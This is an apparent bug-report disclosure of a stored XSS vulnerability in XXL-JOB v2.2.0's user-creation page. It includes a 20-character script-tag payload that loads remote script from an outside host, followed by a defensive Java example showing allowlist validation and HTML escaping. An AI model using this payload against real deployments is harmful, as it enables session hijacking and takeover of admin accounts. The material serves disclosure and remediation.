xxl-job v2.2.0 Add User Stored XSS vulnerabilities. Escape 20 length limit

scyqe7ek posted on 2021-11-29 in Java

Please answer some questions before submitting your issue. Thanks!

Which version of XXL-JOB are you using?

v2.2.0

Expected behavior

Add User.

Actual behavior

Add User Stored XSS vulnerabilities. Escape 20 length limit

Steps to reproduce the behavior

url: https://github.com/xuxueli/xxl-job/blob/master/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/UserController.java

poc: <script/src=//14.rs>

The page automatically loads and triggers XSS

Other information

Restoration suggestions:
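
Added example, not part of the original issue and not xxl-job's own code: the PoC string above is exactly 20 characters long, so a length limit alone accepts it. The sketch below contrasts a length-only check with an allowlist check on input and HTML encoding on output. The class name, method names and the allowed character set are assumptions made for illustration.

```java
import java.util.regex.Pattern;

public class UsernameXssCheck {
    // Assumption: usernames may contain only letters, digits, '_' and '-', at most 20 chars.
    private static final Pattern ALLOWED = Pattern.compile("^[A-Za-z0-9_-]{1,20}$");

    // Length-only validation: the kind of limit the report says the PoC fits under.
    static boolean lengthOnly(String name) {
        return name != null && !name.trim().isEmpty() && name.trim().length() <= 20;
    }

    // Allowlist validation: rejects any value containing markup characters.
    static boolean allowlisted(String name) {
        return name != null && ALLOWED.matcher(name).matches();
    }

    // HTML text-context encoder applied when the stored value is written into a page.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // "alice_01" is a constructed benign sample; the second value is the PoC string from the report.
        String[] samples = { "alice_01", "<script/src=//14.rs>" };
        for (String s : samples) {
            System.out.printf("%-22s len=%d lengthOnly=%b allowlisted=%b rendered=%s%n",
                    s, s.length(), lengthOnly(s), allowlisted(s), escapeHtml(s));
        }
    }
}
```

Encoding at output time also covers values that were stored before any input validation was introduced.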
